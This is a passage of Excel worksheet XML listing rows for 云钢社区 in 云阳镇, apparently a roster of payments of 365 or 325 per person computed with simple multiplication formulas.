    <row r="1656" customHeight="1" spans="1:11">
      <c r="A1656" s="16" t="s">
        <v>4432</v>
      </c>
      <c r="B1656" s="17" t="str">
        <f>B1655</f>
        <v>云阳镇</v>
      </c>
      <c r="C1656" s="17" t="str">
        <f>C1655</f>
        <v>云钢社区</v>
      </c>
      <c r="D1656" s="51" t="s">
        <v>4433</v>
      </c>
      <c r="E1656" s="32" t="s">
        <v>4434</v>
      </c>
      <c r="F1656" s="17" t="str">
        <f>F1655</f>
        <v>4113210599</v>
      </c>
      <c r="G1656" s="17"/>
      <c r="H1656" s="17"/>
      <c r="I1656" s="17"/>
      <c r="J1656" s="17"/>
      <c r="K1656" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1657" customHeight="1" spans="1:11">
      <c r="A1657" s="16" t="s">
        <v>4435</v>
      </c>
      <c r="B1657" s="17" t="str">
        <f>B1656</f>
        <v>云阳镇</v>
      </c>
      <c r="C1657" s="17" t="str">
        <f>C1656</f>
        <v>云钢社区</v>
      </c>
      <c r="D1657" s="51" t="s">
        <v>4436</v>
      </c>
      <c r="E1657" s="51" t="s">
        <v>4437</v>
      </c>
      <c r="F1657" s="17" t="str">
        <f>F1656</f>
        <v>4113210599</v>
      </c>
      <c r="G1657" s="17"/>
      <c r="H1657" s="17"/>
      <c r="I1657" s="17"/>
      <c r="J1657" s="17"/>
      <c r="K1657" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1658" customHeight="1" spans="1:11">
      <c r="A1658" s="16" t="s">
        <v>4438</v>
      </c>
      <c r="B1658" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1658" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1658" s="17" t="s">
        <v>4439</v>
      </c>
      <c r="E1658" s="17" t="s">
        <v>3806</v>
      </c>
      <c r="F1658" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1658" s="17">
        <v>1</v>
      </c>
      <c r="H1658" s="18">
        <v>365</v>
      </c>
      <c r="I1658" s="17">
        <f>H1658*G1658</f>
        <v>365</v>
      </c>
      <c r="J1658" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1658" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1659" customHeight="1" spans="1:11">
      <c r="A1659" s="16" t="s">
        <v>4440</v>
      </c>
      <c r="B1659" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1659" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1659" s="17" t="s">
        <v>4441</v>
      </c>
      <c r="E1659" s="17" t="s">
        <v>4442</v>
      </c>
      <c r="F1659" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1659" s="17">
        <v>1</v>
      </c>
      <c r="H1659" s="18">
        <v>365</v>
      </c>
      <c r="I1659" s="17">
        <f>H1659*G1659</f>
        <v>365</v>
      </c>
      <c r="J1659" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1659" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1660" customHeight="1" spans="1:11">
      <c r="A1660" s="16" t="s">
        <v>4443</v>
      </c>
      <c r="B1660" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1660" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1660" s="17" t="s">
        <v>4444</v>
      </c>
      <c r="E1660" s="17" t="s">
        <v>3852</v>
      </c>
      <c r="F1660" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1660" s="17">
        <v>2</v>
      </c>
      <c r="H1660" s="18">
        <v>325</v>
      </c>
      <c r="I1660" s="17">
        <f>H1660*G1660</f>
        <v>650</v>
      </c>
      <c r="J1660" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1660" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1661" customHeight="1" spans="1:11">
      <c r="A1661" s="16" t="s">
        <v>4445</v>
      </c>
      <c r="B1661" s="17" t="str">
        <f>B1660</f>
        <v>云阳镇</v>
      </c>
      <c r="C1661" s="17" t="str">
        <f>C1660</f>
        <v>云钢社区</v>
      </c>
      <c r="D1661" s="51" t="s">
        <v>4446</v>
      </c>
      <c r="E1661" s="32" t="s">
        <v>3583</v>
      </c>
      <c r="F1661" s="17" t="str">
        <f>F1660</f>
        <v>4113210599</v>
      </c>
      <c r="G1661" s="17"/>
      <c r="H1661" s="17"/>
      <c r="I1661" s="17"/>
      <c r="J1661" s="17"/>
      <c r="K1661" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1662" customHeight="1" spans="1:11">
      <c r="A1662" s="16" t="s">
        <v>4447</v>
      </c>
      <c r="B1662" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1662" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1662" s="17" t="s">
        <v>4448</v>
      </c>
      <c r="E1662" s="17" t="s">
        <v>4449</v>
      </c>
      <c r="F1662" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1662" s="17">
        <v>1</v>
      </c>
      <c r="H1662" s="18">
        <v>365</v>
      </c>
      <c r="I1662" s="17">
        <f>H1662*G1662</f>
        <v>365</v>
      </c>
      <c r="J1662" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1662" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1663" customHeight="1" spans="1:11">
      <c r="A1663" s="16" t="s">
        <v>4450</v>
      </c>
      <c r="B1663" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1663" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1663" s="17" t="s">
        <v>4451</v>
      </c>
      <c r="E1663" s="17" t="s">
        <v>4452</v>
      </c>
      <c r="F1663" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1663" s="17">
        <v>1</v>
      </c>
      <c r="H1663" s="18">
        <v>365</v>
      </c>
      <c r="I1663" s="17">
        <f>H1663*G1663</f>
        <v>365</v>
      </c>
      <c r="J1663" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1663" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1664" customHeight="1" spans="1:11">
      <c r="A1664" s="16" t="s">
        <v>4453</v>
      </c>
      <c r="B1664" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1664" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1664" s="17" t="s">
        <v>4454</v>
      </c>
      <c r="E1664" s="17" t="s">
        <v>4455</v>
      </c>
      <c r="F1664" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1664" s="17">
        <v>2</v>
      </c>
      <c r="H1664" s="18">
        <v>325</v>
      </c>
      <c r="I1664" s="17">
        <f>H1664*G1664</f>
        <v>650</v>
      </c>
      <c r="J1664" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1664" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1665" customHeight="1" spans="1:11">
      <c r="A1665" s="16" t="s">
        <v>4456</v>
      </c>
      <c r="B1665" s="17" t="str">
        <f>B1664</f>
        <v>云阳镇</v>
      </c>
      <c r="C1665" s="17" t="str">
        <f>C1664</f>
        <v>云钢社区</v>
      </c>
      <c r="D1665" s="51" t="s">
        <v>4457</v>
      </c>
      <c r="E1665" s="51" t="s">
        <v>4458</v>
      </c>
      <c r="F1665" s="17" t="str">
        <f>F1664</f>
        <v>4113210599</v>
      </c>
      <c r="G1665" s="17"/>
      <c r="H1665" s="17"/>
      <c r="I1665" s="17"/>
      <c r="J1665" s="17"/>
      <c r="K1665" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1666" customHeight="1" spans="1:11">
      <c r="A1666" s="16" t="s">
        <v>4459</v>
      </c>
      <c r="B1666" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1666" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1666" s="17" t="s">
        <v>4460</v>
      </c>
      <c r="E1666" s="17" t="s">
        <v>1144</v>
      </c>
      <c r="F1666" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1666" s="17">
        <v>1</v>
      </c>
      <c r="H1666" s="18">
        <v>365</v>
      </c>
      <c r="I1666" s="17">
        <f t="shared" ref="I1666:I1674" si="89">H1666*G1666</f>
        <v>365</v>
      </c>
      <c r="J1666" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1666" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1667" customHeight="1" spans="1:11">
      <c r="A1667" s="16" t="s">
        <v>4461</v>
      </c>
      <c r="B1667" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1667" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1667" s="17" t="s">
        <v>4462</v>
      </c>
      <c r="E1667" s="17" t="s">
        <v>4463</v>
      </c>
      <c r="F1667" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1667" s="17">
        <v>1</v>
      </c>
      <c r="H1667" s="18">
        <v>365</v>
      </c>
      <c r="I1667" s="17">
        <f t="shared" si="89"/>
        <v>365</v>
      </c>
      <c r="J1667" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1667" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1668" customHeight="1" spans="1:11">
      <c r="A1668" s="16" t="s">
        <v>4464</v>
      </c>
      <c r="B1668" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1668" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1668" s="17" t="s">
        <v>4465</v>
      </c>
      <c r="E1668" s="17" t="s">
        <v>4466</v>
      </c>
      <c r="F1668" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1668" s="17">
        <v>1</v>
      </c>
      <c r="H1668" s="18">
        <v>365</v>
      </c>
      <c r="I1668" s="17">
        <f t="shared" si="89"/>
        <v>365</v>
      </c>
      <c r="J1668" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1668" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1669" customHeight="1" spans="1:11">
      <c r="A1669" s="16" t="s">
        <v>4467</v>
      </c>
      <c r="B1669" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1669" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1669" s="17" t="s">
        <v>4468</v>
      </c>
      <c r="E1669" s="17" t="s">
        <v>3597</v>
      </c>
      <c r="F1669" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1669" s="17">
        <v>1</v>
      </c>
      <c r="H1669" s="18">
        <v>365</v>
      </c>
      <c r="I1669" s="17">
        <f t="shared" si="89"/>
        <v>365</v>
      </c>
      <c r="J1669" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1669" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1670" customHeight="1" spans="1:11">
      <c r="A1670" s="16" t="s">
        <v>4469</v>
      </c>
      <c r="B1670" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1670" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1670" s="17" t="s">
        <v>4470</v>
      </c>
      <c r="E1670" s="17" t="s">
        <v>4471</v>
      </c>
      <c r="F1670" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1670" s="17">
        <v>1</v>
      </c>
      <c r="H1670" s="18">
        <v>365</v>
      </c>
      <c r="I1670" s="17">
        <f t="shared" si="89"/>
        <v>365</v>
      </c>
      <c r="J1670" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1670" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1671" customHeight="1" spans="1:11">
      <c r="A1671" s="16" t="s">
        <v>4472</v>
      </c>
      <c r="B1671" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1671" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1671" s="17" t="s">
        <v>4473</v>
      </c>
      <c r="E1671" s="17" t="s">
        <v>3945</v>
      </c>
      <c r="F1671" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1671" s="17">
        <v>1</v>
      </c>
      <c r="H1671" s="18">
        <v>365</v>
      </c>
      <c r="I1671" s="17">
        <f t="shared" si="89"/>
        <v>365</v>
      </c>
      <c r="J1671" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1671" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1672" customHeight="1" spans="1:11">
      <c r="A1672" s="16" t="s">
        <v>4474</v>
      </c>
      <c r="B1672" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1672" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1672" s="17" t="s">
        <v>4475</v>
      </c>
      <c r="E1672" s="17" t="s">
        <v>4476</v>
      </c>
      <c r="F1672" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1672" s="17">
        <v>1</v>
      </c>
      <c r="H1672" s="18">
        <v>365</v>
      </c>
      <c r="I1672" s="17">
        <f t="shared" si="89"/>
        <v>365</v>
      </c>
      <c r="J1672" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1672" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1673" customHeight="1" spans="1:11">
      <c r="A1673" s="16" t="s">
        <v>4477</v>
      </c>
      <c r="B1673" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1673" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1673" s="17" t="s">
        <v>4478</v>
      </c>
      <c r="E1673" s="17" t="s">
        <v>4479</v>
      </c>
      <c r="F1673" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1673" s="17">
        <v>1</v>
      </c>
      <c r="H1673" s="18">
        <v>365</v>
      </c>
      <c r="I1673" s="17">
        <f t="shared" si="89"/>
        <v>365</v>
      </c>
      <c r="J1673" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1673" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1674" customHeight="1" spans="1:11">
      <c r="A1674" s="16" t="s">
        <v>4480</v>
      </c>
      <c r="B1674" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1674" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1674" s="17" t="s">
        <v>4481</v>
      </c>
      <c r="E1674" s="17" t="s">
        <v>3657</v>
      </c>
      <c r="F1674" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1674" s="17">
        <v>2</v>
      </c>
      <c r="H1674" s="18">
        <v>325</v>
      </c>
      <c r="I1674" s="17">
        <f t="shared" si="89"/>
        <v>650</v>
      </c>
      <c r="J1674" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1674" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1675" customHeight="1" spans="1:11">
      <c r="A1675" s="16" t="s">
        <v>4482</v>
      </c>
      <c r="B1675" s="17" t="str">
        <f>B1674</f>
        <v>云阳镇</v>
      </c>
      <c r="C1675" s="17" t="str">
        <f>C1674</f>
        <v>云钢社区</v>
      </c>
      <c r="D1675" s="51" t="s">
        <v>4483</v>
      </c>
      <c r="E1675" s="32" t="s">
        <v>4484</v>
      </c>
      <c r="F1675" s="17" t="str">
        <f>F1674</f>
        <v>4113210599</v>
      </c>
      <c r="G1675" s="17"/>
      <c r="H1675" s="17"/>
      <c r="I1675" s="17"/>
      <c r="J1675" s="17"/>
      <c r="K1675" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1676" customHeight="1" spans="1:11">
      <c r="A1676" s="16" t="s">
        <v>4485</v>
      </c>
      <c r="B1676" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1676" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1676" s="17" t="s">
        <v>4486</v>
      </c>
      <c r="E1676" s="17" t="s">
        <v>4487</v>
      </c>
      <c r="F1676" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1676" s="17">
        <v>1</v>
      </c>
      <c r="H1676" s="18">
        <v>365</v>
      </c>
      <c r="I1676" s="17">
        <f t="shared" ref="I1676:I1686" si="90">H1676*G1676</f>
        <v>365</v>
      </c>
      <c r="J1676" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1676" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1677" customHeight="1" spans="1:11">
      <c r="A1677" s="16" t="s">
        <v>4488</v>
      </c>
      <c r="B1677" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1677" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1677" s="17" t="s">
        <v>4489</v>
      </c>
      <c r="E1677" s="17" t="s">
        <v>3772</v>
      </c>
      <c r="F1677" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1677" s="17">
        <v>1</v>
      </c>
      <c r="H1677" s="18">
        <v>365</v>
      </c>
      <c r="I1677" s="17">
        <f t="shared" si="90"/>
        <v>365</v>
      </c>
      <c r="J1677" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1677" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1678" customHeight="1" spans="1:11">
      <c r="A1678" s="16" t="s">
        <v>4490</v>
      </c>
      <c r="B1678" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1678" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1678" s="17" t="s">
        <v>4491</v>
      </c>
      <c r="E1678" s="17" t="s">
        <v>4492</v>
      </c>
      <c r="F1678" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1678" s="17">
        <v>1</v>
      </c>
      <c r="H1678" s="18">
        <v>365</v>
      </c>
      <c r="I1678" s="17">
        <f t="shared" si="90"/>
        <v>365</v>
      </c>
      <c r="J1678" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1678" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1679" customHeight="1" spans="1:11">
      <c r="A1679" s="16" t="s">
        <v>4493</v>
      </c>
      <c r="B1679" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1679" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1679" s="17" t="s">
        <v>4494</v>
      </c>
      <c r="E1679" s="17" t="s">
        <v>3510</v>
      </c>
      <c r="F1679" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1679" s="17">
        <v>1</v>
      </c>
      <c r="H1679" s="18">
        <v>365</v>
      </c>
      <c r="I1679" s="17">
        <f t="shared" si="90"/>
        <v>365</v>
      </c>
      <c r="J1679" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1679" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1680" customHeight="1" spans="1:11">
      <c r="A1680" s="16" t="s">
        <v>4495</v>
      </c>
      <c r="B1680" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1680" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1680" s="17" t="s">
        <v>4496</v>
      </c>
      <c r="E1680" s="17" t="s">
        <v>3358</v>
      </c>
      <c r="F1680" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1680" s="17">
        <v>1</v>
      </c>
      <c r="H1680" s="18">
        <v>365</v>
      </c>
      <c r="I1680" s="17">
        <f t="shared" si="90"/>
        <v>365</v>
      </c>
      <c r="J1680" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1680" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1681" customHeight="1" spans="1:11">
      <c r="A1681" s="16" t="s">
        <v>4497</v>
      </c>
      <c r="B1681" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1681" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1681" s="17" t="s">
        <v>4498</v>
      </c>
      <c r="E1681" s="17" t="s">
        <v>4499</v>
      </c>
      <c r="F1681" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1681" s="17">
        <v>1</v>
      </c>
      <c r="H1681" s="18">
        <v>365</v>
      </c>
      <c r="I1681" s="17">
        <f t="shared" si="90"/>
        <v>365</v>
      </c>
      <c r="J1681" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1681" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1682" customHeight="1" spans="1:11">
      <c r="A1682" s="16" t="s">
        <v>4500</v>
      </c>
      <c r="B1682" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1682" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1682" s="17" t="s">
        <v>4501</v>
      </c>
      <c r="E1682" s="17" t="s">
        <v>4502</v>
      </c>
      <c r="F1682" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1682" s="17">
        <v>1</v>
      </c>
      <c r="H1682" s="18">
        <v>365</v>
      </c>
      <c r="I1682" s="17">
        <f t="shared" si="90"/>
        <v>365</v>
      </c>
      <c r="J1682" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1682" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1683" customHeight="1" spans="1:11">
      <c r="A1683" s="16" t="s">
        <v>4503</v>
      </c>
      <c r="B1683" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1683" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1683" s="17" t="s">
        <v>4504</v>
      </c>
      <c r="E1683" s="17" t="s">
        <v>3715</v>
      </c>
      <c r="F1683" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1683" s="17">
        <v>1</v>
      </c>
      <c r="H1683" s="18">
        <v>365</v>
      </c>
      <c r="I1683" s="17">
        <f t="shared" si="90"/>
        <v>365</v>
      </c>
      <c r="J1683" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1683" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1684" customHeight="1" spans="1:11">
      <c r="A1684" s="16" t="s">
        <v>4505</v>
      </c>
      <c r="B1684" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1684" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1684" s="17" t="s">
        <v>4506</v>
      </c>
      <c r="E1684" s="17" t="s">
        <v>3772</v>
      </c>
      <c r="F1684" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1684" s="17">
        <v>1</v>
      </c>
      <c r="H1684" s="18">
        <v>365</v>
      </c>
      <c r="I1684" s="17">
        <f t="shared" si="90"/>
        <v>365</v>
      </c>
      <c r="J1684" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1684" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1685" customHeight="1" spans="1:11">
      <c r="A1685" s="16" t="s">
        <v>4507</v>
      </c>
      <c r="B1685" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1685" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1685" s="17" t="s">
        <v>4508</v>
      </c>
      <c r="E1685" s="17" t="s">
        <v>4509</v>
      </c>
      <c r="F1685" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1685" s="17">
        <v>1</v>
      </c>
      <c r="H1685" s="18">
        <v>365</v>
      </c>
      <c r="I1685" s="17">
        <f t="shared" si="90"/>
        <v>365</v>
      </c>
      <c r="J1685" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1685" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1686" customHeight="1" spans="1:11">
      <c r="A1686" s="16" t="s">
        <v>4510</v>
      </c>
      <c r="B1686" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1686" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1686" s="17" t="s">
        <v>4511</v>
      </c>
      <c r="E1686" s="17" t="s">
        <v>4512</v>
      </c>
      <c r="F1686" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1686" s="17">
        <v>2</v>
      </c>
      <c r="H1686" s="18">
        <v>325</v>
      </c>
      <c r="I1686" s="17">
        <f t="shared" si="90"/>
        <v>650</v>
      </c>
      <c r="J1686" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1686" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1687" customHeight="1" spans="1:11">
      <c r="A1687" s="16" t="s">
        <v>4513</v>
      </c>
      <c r="B1687" s="17" t="str">
        <f>B1686</f>
        <v>云阳镇</v>
      </c>
      <c r="C1687" s="17" t="str">
        <f>C1686</f>
        <v>云钢社区</v>
      </c>
      <c r="D1687" s="32" t="s">
        <v>4514</v>
      </c>
      <c r="E1687" s="32" t="s">
        <v>3753</v>
      </c>
      <c r="F1687" s="17" t="str">
        <f>F1686</f>
        <v>4113210599</v>
      </c>
      <c r="G1687" s="17"/>
      <c r="H1687" s="17"/>
      <c r="I1687" s="17"/>
      <c r="J1687" s="17"/>
      <c r="K1687" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1688" customHeight="1" spans="1:11">
      <c r="A1688" s="16" t="s">
        <v>4515</v>
      </c>
      <c r="B1688" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1688" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1688" s="17" t="s">
        <v>4516</v>
      </c>
      <c r="E1688" s="17" t="s">
        <v>2500</v>
      </c>
      <c r="F1688" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1688" s="17">
        <v>1</v>
      </c>
      <c r="H1688" s="18">
        <v>365</v>
      </c>
      <c r="I1688" s="17">
        <f t="shared" ref="I1688:I1694" si="91">H1688*G1688</f>
        <v>365</v>
      </c>
      <c r="J1688" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1688" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1689" customHeight="1" spans="1:11">
      <c r="A1689" s="16" t="s">
        <v>4517</v>
      </c>
      <c r="B1689" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1689" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1689" s="17" t="s">
        <v>4518</v>
      </c>
      <c r="E1689" s="17" t="s">
        <v>4512</v>
      </c>
      <c r="F1689" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1689" s="17">
        <v>1</v>
      </c>
      <c r="H1689" s="18">
        <v>365</v>
      </c>
      <c r="I1689" s="17">
        <f t="shared" si="91"/>
        <v>365</v>
      </c>
      <c r="J1689" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1689" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1690" customHeight="1" spans="1:11">
      <c r="A1690" s="16" t="s">
        <v>4519</v>
      </c>
      <c r="B1690" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1690" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1690" s="17" t="s">
        <v>4520</v>
      </c>
      <c r="E1690" s="17" t="s">
        <v>3747</v>
      </c>
      <c r="F1690" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1690" s="17">
        <v>1</v>
      </c>
      <c r="H1690" s="18">
        <v>365</v>
      </c>
      <c r="I1690" s="17">
        <f t="shared" si="91"/>
        <v>365</v>
      </c>
      <c r="J1690" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1690" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1691" customHeight="1" spans="1:11">
      <c r="A1691" s="16" t="s">
        <v>4521</v>
      </c>
      <c r="B1691" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1691" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1691" s="17" t="s">
        <v>4522</v>
      </c>
      <c r="E1691" s="17" t="s">
        <v>3621</v>
      </c>
      <c r="F1691" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1691" s="17">
        <v>1</v>
      </c>
      <c r="H1691" s="18">
        <v>365</v>
      </c>
      <c r="I1691" s="17">
        <f t="shared" si="91"/>
        <v>365</v>
      </c>
      <c r="J1691" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1691" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1692" customHeight="1" spans="1:11">
      <c r="A1692" s="16" t="s">
        <v>4523</v>
      </c>
      <c r="B1692" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1692" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1692" s="17" t="s">
        <v>4524</v>
      </c>
      <c r="E1692" s="17" t="s">
        <v>3889</v>
      </c>
      <c r="F1692" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1692" s="17">
        <v>1</v>
      </c>
      <c r="H1692" s="18">
        <v>365</v>
      </c>
      <c r="I1692" s="17">
        <f t="shared" si="91"/>
        <v>365</v>
      </c>
      <c r="J1692" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1692" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1693" customHeight="1" spans="1:11">
      <c r="A1693" s="16" t="s">
        <v>4525</v>
      </c>
      <c r="B1693" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1693" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1693" s="17" t="s">
        <v>4526</v>
      </c>
      <c r="E1693" s="17" t="s">
        <v>2572</v>
      </c>
      <c r="F1693" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1693" s="17">
        <v>1</v>
      </c>
      <c r="H1693" s="18">
        <v>365</v>
      </c>
      <c r="I1693" s="17">
        <f t="shared" si="91"/>
        <v>365</v>
      </c>
      <c r="J1693" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1693" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1694" customHeight="1" spans="1:11">
      <c r="A1694" s="16" t="s">
        <v>4527</v>
      </c>
      <c r="B1694" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1694" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1694" s="17" t="s">
        <v>4528</v>
      </c>
      <c r="E1694" s="17" t="s">
        <v>2850</v>
      </c>
      <c r="F1694" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1694" s="17">
        <v>2</v>
      </c>
      <c r="H1694" s="18">
        <v>325</v>
      </c>
